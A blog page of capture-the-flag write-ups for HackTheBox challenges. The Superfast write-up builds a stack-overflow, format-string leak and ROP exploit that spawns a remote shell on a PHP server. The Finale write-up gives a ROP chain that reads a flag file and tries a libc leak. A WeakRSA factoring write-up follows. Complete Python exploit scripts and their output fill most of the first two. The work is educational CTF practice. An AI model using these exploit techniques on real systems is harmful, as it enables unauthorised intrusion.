28 Lis

Superfast (HackTheBox)

Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:

We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we aquired from a temporarily exposed Git repository several months ago.Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners – can you find a way in?

I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.

Index

  • First looks
  • Finding primitives
  • Developing the ROP chain
  • Retrieving the flag

First looks

We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.

.
├── build_docker.sh
├── challenge
│   ├── index.php
│   ├── php_logger.so
│   └── start.sh
├── Dockerfile
└── src ├── build.sh ├── config.m4 ├── php_logger.c └── php_logger.h 2 directories, 9 files
Directories given with the challenge

In /challenge/start.sh we can see that the challenge code gets bootstrapped using:

#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done
The content of start.sh

We can see that PHP loads php_logger.so as a binary extension for the webserver.

Finding primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.

Analysing index.php

The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.

<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) { $key = intval($_SERVER['HTTP_CMD_KEY']); if ($key <= 0 || $key > 255) { http_response_code(400); } else { log_cmd($_GET['cmd'], $key); }
} else { http_response_code(400);
}
Content of index.php

One of the most important stages of exploit development is making a reproducing environment. Considering I want to run GDB on php_logger.so, I will run the challenge without Docker. I can run the PHP index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and I can send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123. We can see it succeeds because it returns a 200 status code.

[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing
Verbose output of the PHP webserver

Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.

Analyzing php_logger.so

We can find the source code of php_logger.so in /src/php_logger.c. Under which, we can find the source code of log_cmd() as well. We can see that log_cmd() retrieves function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and – if the return is valid – appends to the /tmp/log file.  

PHP_FUNCTION(log_cmd) { char* input; zend_string* res; size_t size; long key; if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) { RETURN_NULL(); } res = decrypt(input, size, (uint8_t)key); if (!res) { print_message("Invalid input provided\n"); } else { FILE* f = fopen("/tmp/log", "a"); fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f); fclose(f); } RETURN_NULL();
}
Source code of log_cmd()

This function does look safe, so the vulnerability is in decrypt(input, size, key). This function checks if the size of the command is less than the size of the stack buffer. If it is more it will return, but if it is less it will memcpy() and XOR the buffer with the key.

zend_string* decrypt(char* buf, size_t size, uint8_t key) { char buffer[64] = {0}; if (sizeof(buffer) - size > 0) { memcpy(buffer, buf, size); } else { return NULL; } for (int i = 0; i < sizeof(buffer) - 1; i++) { buffer[i] ^= key; } return zend_string_init(buffer, strlen(buffer), 0);
}
Source code of decrypt()

We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is  4294967295 1.

int main()
{ unsigned int a = 5; int b = 6; printf("%u %d", a - b, a - b > 0);
}
Demo of interaction between (unsigned) integers

That means that sizeof(buffer) - size > 0) is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra – the reverse engineering suite developed by the NSA – we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.

Stack variable offsets in Ghidra

However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the smallest 12 bits of an address are not random, and thus can we reliably overwrite 12 bits of the return address. Say our normal return address would be 0x555555559a1e, in the next program, it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the smallest 12 bits.

The reason only the first 12 bits of the address don't change, is because they point to 4096 bytes (2 ** 12 bits), which is the page size. The kernel – the manager of ASLR – can't work with addresses smaller than 4096 bytes.  

Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.

In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.

 0010141e 48 89 ce MOV param_2,RCX 00101421 48 89 c7 MOV param_1,RAX 00101424 e8 07 fc CALL decrypt ff ff 00101429 48 89 44 MOV qword ptr [RSP + local_10],RAX 24 38 0010142e 48 83 7c CMP qword ptr [RSP + local_10],0x0 24 38 00

The code in our return scope is the following. We can see that decrypt() is called, print_message() is called and a bunch of file IO functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.  

 *(undefined4 *)(param_2 + 8) = 1; } else { iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen); local_10 = CONCAT44(extraout_var,iVar1); if (local_10 == 0) { print_message("Invalid input provided\n"); } else { local_18 = fopen("/tmp/log","a"); fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18); fclose(local_18); } *(undefined4 *)(param_2 + 8) = 1; } return;
}
C decompilation of our return scope 

However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.

 00101385 48 8b 84 MOV RAX,qword ptr [RSP + local_18] 24 a0 00 00 00 0010138d 48 89 c6 MOV inputlen,RAX 00101390 48 89 cf MOV input,param_4 00101393 e8 e8 fc CALL <EXTERNAL>::memcpy ff ff 00101398 48 8b 54 MOV key,qword ptr [RSP + local_58] 24 60
Assembly code which moves the input into the RDI register

When I try to fuzz using a script, I receive the following output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~
Fuzzing output
from pwn import xor
import requests xorkey = 1 s = requests.session()
headers = {"cmd-key": str(xorkey)} # offset = 152 payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))
Script used to fuzz

However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000     0x7f6513200000 rw-p   200000      0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.

from pwn import xor, gdb, u64
import requests
import time gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5) xorkey = 1 s = requests.session()
headers = {"cmd-key": str(xorkey)} payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00')))) time.sleep(999)
Script for debugging using GDB

Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:

php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480
Output of the script
#!/usr/bin/env python3 from pwn import xor, u64, gdb
import requests
import time gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue') time.sleep(3) xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)} fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url) content = s.get(url, headers=headers).content
addresses = content.split(b"_") php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16) print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack)) time.sleep(999)
Payload for leaking addresses

We have the needed primitives, so we can develop the ROP chain.

Developing the ROP chain

Now we can use pwntools' ELF classes in order to make automatic ROP-chains. Using pwntools' ELF class we can see that the execl function in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:

  1. Leaking the address of the PHP binary and the php_logger.so in memory.
  2. dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
  3. execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable

We can generate a ROP chain automatically with pwntools:

rop = ROP(php) '''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
''' # set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2]) binsh = next(php.search(b"/bin/sh\x00")) rop.call('execl', [binsh, binsh, 0])
print(rop.dump())
Python code for generating the ROP chain

Which gives the following ROP chain:

0x0000: 0x56244b60816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x56244b6043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x56244b601be0 dup2
0x0028: 0x56244b60816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x56244b6043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x56244b601be0 dup2
0x0050: 0x56244b60816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x56244b6043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x56244b601be0 dup2
0x0078: 0x56244b60816b pop rdi; ret
0x0080: 0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088: 0x56244b60487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x56244b6043fc pop rsi; ret
0x00a0: 0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8: 0x56244b6042d0 execl
ROP chain generated by pwntools

As we can see, it does the following:

dup(4, 0)
dup(4, 1)
dup(4, 2)
execl("/bin/sh", "/bin/sh", 0)
C representation of the ROP chain

Retrieving the flag

I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.

#!/usr/bin/env python3 from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib #gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5) target_ip = b"161.35.173.232"
target_port = b"31302" target_host = b"http://" + target_ip + b":" + target_port s = requests.session()
headers = {"cmd-key": "1"} fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40" print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_") print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16) print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack)) rop = ROP(php) '''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
''' # set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2]) binsh = next(php.search(b"/bin/sh\x00")) rop.call('execl', [binsh, binsh, 0])
print(rop.dump()) payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n" print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive() time.sleep(999)
Python script for retrieving the flag
$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000: 0x55da3d00816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x55da3d0043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x55da3d001be0 dup2
0x0028: 0x55da3d00816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x55da3d0043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x55da3d001be0 dup2
0x0050: 0x55da3d00816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x55da3d0043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x55da3d001be0 dup2
0x0078: 0x55da3d00816b pop rdi; ret
0x0080: 0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088: 0x55da3d00487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x55da3d0043fc pop rsi; ret
0x00a0: 0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8: 0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf
Output of the exploit

Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.

26 Lis

Finale (HackTheBox)

Hey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:

It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true! Wish you the best for the upcoming year!

In this write-up, we will learn about the stack, ROP chains, and prioritizing attack vectors.

Spoiler alert: if you can't find the libc version, it's not a bug.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing the ROP chain
  • Retrieving the flag
  • Failed attempt

First looks

We are given an executable binary called finale. Upon performing a dynamic analysis, we are prompted for a password which means that we'll need to do a static analysis in order to proceed.

[Strange man in mask screams some nonsense]: iut2rxgf [Strange man in mask]: In order to proceed, tell us the secret phrase: <...> [Strange man in mask]: Sorry, you are not allowed to enter here!
The dynamic analysis

Running pwntools' checksec on finale gives us:

$ checksec finale Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
Checksec output

The fields mean:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
  • RELRO: Relocation Read-Only – secures the dynamic linking process
  • Stack Canaries: protects against stack buffer overflow attacks
  • NX: No eXecute – write-able memory cannot be executed
  • PIE: Position Independable Executable – address randomization

For a more in-depth conclusion about checksec, please visit our previous blogpost about the Blacksmith challenge on Hack The Box. The logical conclusion is that we need to perform a stack-based buffer overflow (since Stack Canaries are disabled) leading to a Return-Oriented-Programming chain (since NX is enabled).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact.

Main() analysis

In order to analyze the binary, I opened it up in Ghidra, made by the NSA. The main() function prints 8 random bytes, asks us for a secret and calls finale().

long main()
{ int iVar1; char secret [16]; char rand [8]; ulong i; banner(); rand = 0; iVar1 = open("/dev/urandom",0); read(iVar1,rand,8); printf("\n[Strange man in mask screams some nonsense]: %s\n\n",rand); close(iVar1); secret._0_8_ = 0; secret._8_8_ = 0; printf("[Strange man in mask]: In order to proceed, tell us the secret phrase: "); __isoc99_scanf("%16s",secret); i = 0; do { if (i > 14) {
LAB_CHECK_SECRET: iVar1 = strncmp(secret,"s34s0nf1n4l3b00",15); if (iVar1 == 0) { finale(); } else { printf("%s\n[Strange man in mask]: Sorry, you are not allowed to enter here!\n\n","\x1b[1;31m"); } return; } if (secret[i] == '\n') { secret[i] = '\0'; goto LAB_CHECK_SECRET; } i++; } while( true );
} 
Main function

As we can see, the secret for the binary is s34s0nf1n4l3b00 and finale() gets called after the correct secret has been entered.

Finale() analysis

As said, main() calls finale() after the secret has been entered. This function asks us for a wish for the next year.

void finale()
{ char buf[64]; printf("\n[Strange man in mask]: Season finale is here! Take this souvenir with you for good luck: [%p]",buf); printf("\n\n[Strange man in mask]: Now, tell us a wish for next year: "); fflush(stdin); fflush(stdout); read(0,buf,0x1000); write(1,"\n[Strange man in mask]: That\'s a nice wish! Let the Spooktober Spirit be with you!\n\n",0x54); return;
}
Finale function

We are given stack leak in the form of char* buf. Furthermore, there is a stack buffer overflow: the buffer length is 64 and we are writing 0x1000 (4096) bytes. In Ghidra we can see that the offset to the return address from the base of buf is 0x48 bytes.

GOT

Considering checksec said No PIE (0x400000), we can use the Procedural Linking Table (PLT) section of the binary. This means we could open a potential flag.txt using open(), read() and write().

Developing the ROP chain

Considering the protections in the binary listed by checksec state that No eXecute is enabled, we need to use Return Oriented Programming (ROP) chains. We want to do the following in the payload:

fd = open("flag.txt", 0);
n_read = read(3, buf, size); // 3 since fd == 3 can be expected
write(1, buf, n_read);

We have access to:

  • Binary/ELF
  •   GOT and PLT (linked functions)
  •  Functions (built-in functions)
  • Stack

Using print(*ELF('challenge/finale').plt.keys()), we can see that the following functions are available in the PLT sections:

strncmp puts write printf alarm
close read srand time fflush
setvbuf open __isoc99_scanf rand
Available functions in the PLT section

Now we have the right functions and have access to the stack (for "flag.txt"), we need to need a way to pass function arguments. The x64 calling convention states that function arguments should be passed (in order) via RDI, RSI, RDX, RCX, R8, R9. This means that we need to control the RDI, RSI, and RDX registers via pop instructions (called gadgets) in the ROP-chain in order to pass 3 arguments to open(), read(), and write(). We can search for such gadgets using ropr: a blazing fast multithreaded ROP Gadget finder. Below is my search regex filter for ropr:

$ ropr -R '^pop (rdi|rsi|rdx); ret;' challenge/finale 0x004012d6: pop rdi; ret;
0x004012d8: pop rsi; ret;

Sadly, ropr can't find any gadgets for the RDX register. Even after trying many more search queries (like EDX and DX), I couldn't find any results. This means that we need to find a workaround for a high-enough RDX value for read(..., ..., size=RDX).

GNU Debugger (GDB)

In order to find out a way to get a high RDX value, I used GDB with the Pwndbg plug-in (please say /pwn-dbg/ and not /poʊndbæg/ as the repo proposes). To see the RDX value during runtime, we can use the GDB functions in pwntools:

#!/usr/bin/env python3 from pwn import ELF, remote, gdb, p64, u64
import time e = ELF('challenge/finale')
p = e.process() # 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6) # 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8) def leak_func(address): payload = b'A'*0x48 payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale) p.sendafter(b"next year: ", payload) p.recvuntil(b"you!\n\n") # clear buffer return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00')) p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [") # clear buffer for next address read leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak)) file = b'flag.txt\0'
rbp = leak + 0x170 payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(0x4014c7) gdb.attach(p, 'b *0x4014c7\ncontinue')
p.sendafter(b"next year: ", payload) while True: print(p.recv())
Payload for opening GDB at the open() call
0x00000000004014e0 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────── RAX 0x3 RBX 0x0 RCX 0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0 RDX 0x8
*RDI 0x3 RSI 0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0 R8 0x3c R9 0x7ffc887451bc ◂— 0x3c00007f76 R10 0x0 R11 0x246 R12 0x7ffc887475f8 —▸ 0x7ffc88748289 ◂— '~/Documents/ctf/htb/finale/challenge/finale' R13 0x401492 (main) ◂— endbr64 R14 0x403d70 (__do_global_dtors_aux_fini_array_entry) —▸ 0x4012a0 (__do_global_dtors_aux) ◂— endbr64 R15 0x7f76d739d040 (_rtld_global) —▸ 0x7f76d739e2e0 ◂— 0x0 RBP 0x7ffc887475c0 —▸ 0x7ffc887475f0 ◂— 0x1 RSP 0x7ffc887474c0 ◂— 0xe193b4642436643b
*RIP 0x4014e0 (main+78) ◂— call 0x401170
─────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────── 0x4014cf <main+61> lea rcx, [rbp - 0x20] 0x4014d3 <main+65> mov eax, dword ptr [rbp - 0xc] 0x4014d6 <main+68> mov edx, 8 0x4014db <main+73> mov rsi, rcx 0x4014de <main+76> mov edi, eax ► 0x4014e0 <main+78> call read@plt <read@plt> fd: 0x3 (~/Documents/ctf/htb/finale/flag.txt) buf: 0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0 nbytes: 0x8 0x4014e5 <main+83> lea rax, [rbp - 0x20] 0x4014e9 <main+87> mov rsi, rax 0x4014ec <main+90> lea rax, [rip + 0x1425] 0x4014f3 <main+97> mov rdi, rax 0x4014f6 <main+100> mov eax, 0
GDB breakpoint dump

As we can see, RDX is equal to 8 which means only 8 bytes of the flag get read and written to stdout. Since we need to read at least 32 bytes, we need to find a way of manipulating the RDX register. We could do this by:

  • Calling open("flag.txt", 0) using the PLT section in the ELF (which only executes the function and immediately returns after)
  • Manipulate RDX
  • Calling 0x4014e0 so we read() with the manipulated RDX and write() to stdout all at once.

As said, I tried finding gadgets which sadly did not work. After manually analyzing the binary I happened to see the following gadget:

 00401476 ba 54 00 MOV EDX,0x54 00 00 0040147b 48 8d 05 LEA RAX,[s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]: 2e 14 00 00 00401482 48 89 c6 MOV RSI=>s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]: 00401485 bf 01 00 MOV EDI,0x1 00 00 0040148a e8 a1 fc CALL <EXTERNAL>::write ssize_t write(int __fd, void ff ff 0040148f 90 NOP 00401490 c9 LEAVE 00401491 c3 RET
Part of the finale() function

As we can see, the EDX register is set to 0x54. This means we will read and write 84 bytes of the flag, which means it's more than enough and that we have completed the final part of the ROP chain:

  • open@PLT("flag.txt", 0)
  • finale() // to set RDX to 0x54
  • Set RDI to 3
  • Set RSI to the buffer buf
  • JMP 0x4016e0

A.k.a.:

file = b'flag.txt\0'
rbp = leak - 0x5000 payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale) # set RDX p.sendafter(b"next year: ", payload) payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0) # read() -> write() p.sendafter(b"next year: ", payload)
The Python representation of the ROP chain

Retrieving the flag

So, the grant scene of the script is:

#!/usr/bin/env python3 from pwn import ELF, remote, gdb, p64, u64
import time e = ELF('challenge/finale')
is_remote = False
if is_remote: p = remote("167.99.204.5", 31431)
else: p = e.process() # 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6) # 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8) def leak_func(address): payload = b'A'*0x48 payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale) p.sendafter(b"next year: ", payload) p.recvuntil(b"you!\n\n") # clear buffer return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00')) p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [") # clear buffer for next address read leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak)) file = b'flag.txt\0'
rbp = leak - 0x5000 payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale) # set RDX p.sendafter(b"next year: ", payload) payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0) # read() -> write() p.sendafter(b"next year: ", payload)
while True: print(p.recv())

Failed attempt

In my failed attempt I tried to get remote code execution using leaked libc offsets, but it turned out that the libc version on the server was custom and it was intended to prevent this solution. I had to find out by asking the creator of the challenge.

The way we leak libc addresses is by calling puts() in the PLT section with the argument being a libc function linked in the GOT section. So, we need to call puts(const char *string); with argument string via the RDI register in AMD64. To control the RDI register, we use a ROP chain that pops RDI:

$ ropr -R 'pop rdi; ret;' challenge/finale
0x004012d6: pop rdi; ret; ==> Found 1 gadgets in 0.004 seconds

Now we can pop a GOT function address into RDI and call puts() to leak the function offset. Let's run the following script with the server as target to get their libc version:

#!/usr/bin/env python3 from pwn import ELF, remote, gdb, p64, u64
import time e = ELF('challenge/finale')
is_remote = False
if is_remote: p = remote("161.35.173.232", 31394)
else: p = e.process() # 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x004012d6) def leak_func(address): payload = b'A'*0x48 payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale) p.sendafter(b"next year: ", payload) p.recvuntil(b"you!\n\n") # clear buffer return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00')) p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [") # clear buffer for next address read leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak)) #gdb.attach(p)
for name, addr in e.got.items(): print(name, "@", hex(leak_func(addr)))
The payload for leaking LIBC addresses

The output is the following:

__libc_start_main @ 0x7ff2d7c29dc0
__gmon_start__ @ 0x0
stdout @ 0x7ff2d7e1a780
stdin @ 0x7ff2d7e19aa0
strncmp @ 0x0
puts @ 0x7ff2d7c80ed0
write @ 0x7ff2d7d14a20
printf @ 0x7ff2d7c60770
alarm @ 0x7ff2d7cea5b0
close @ 0x0
read @ 0x7ff2d7d14980
srand @ 0x7ff2d7c460a0
time @ 0x7ffdaafcfc60
fflush @ 0x7ff2d7c7f1b0
setvbuf @ 0x7ff2d7c81670
open @ 0x7ff2d7d14690
__isoc99_scanf @ 0x7ff2d7c62110
rand @ 0x7ff2d7c46760

When I enter those symbols and addresses into a libc-leak website like libc.rip, I cannot find a single libc version. That means that there's a custom libc version, which means we can't call system() since we don't have the address.

24 Lis

WeakRSA (HackTheBox)

G'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so however it is important you understand some of the basics. You will learn

  • Basic RSA
  • Decoding pem formats

How does RSA work?

RSA is an encryption algorithm which has been around since 1977. To use it you will need to chose two different large prime numbers these will be named p and q.

By multiplying p and q together you get your modulus named N. Then you can choose your exponent which we will name e.  Now you are ready to encrypt your secret message. Using RSA our encryped message will be calculated like this : (message^e) mod N

In python3 it can be computed like this :

pow(message,e,N)

Decrypting RSA

Decrypting will be a little bit harder. To do so we first must find phi φ(N). We can do so like this : φ(N) =  (p-1) * (q-1).

Remember that we need to know p and q to decrypt this is important. We are finally ready to calculate d, the modular inverse of e. This can be done by using the extended euclidean algorithm. You don't have to understand how (or why) it works but saying it will make you look smart. In python I use xgcd from the libnum library. d will be the first value the algorithm outputs.

d = xgcd(e,φN) [0]

 The plaintext can then be calculated :

plaintext = pow(encrypted, d, N)

Solving the challenge

After downloading and extracting the zip we get a key encoded in the pub format. We can decode it using python or just by using an online tool which gives us the following data :

The Modulus being the public key N and the public exponent is our e

We know that the modulus is just p * q but it will take forever to factor such a large number. If only there was a quicker method. Wait a minute what if there are databases containing the factors of large number… That would be really helpful. After some searching I encountered this site. Let's try to input our N :

Looks like we found p and q. From here we can get the flag using python :

The script should output the flag :

HTB{s1mpl3_Wi3n3rs_4tt4ck}

The lesson this challenge is trying to teach us is that p and q should be above 512 digits. This way the public key is less likely to be factorized, so p and q cant be found and your secret messages wont be able to be decrypted.

20 Lis

Blacksmith (HackTheBox)

